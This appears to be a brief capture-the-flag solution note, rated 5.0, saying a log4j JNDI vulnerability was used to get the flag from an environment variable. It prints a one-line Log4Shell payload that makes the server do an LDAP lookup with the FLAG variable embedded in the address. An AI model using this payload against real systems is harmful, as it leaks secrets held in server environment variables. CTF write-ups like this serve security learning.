Rating: 5.0
We should use log4j CVE to exploit jndi and get flag from environment variable with following command:
${jndi:ldap://127.0.0.1/${env:FLAG}}
link to complete writeup
I don't remember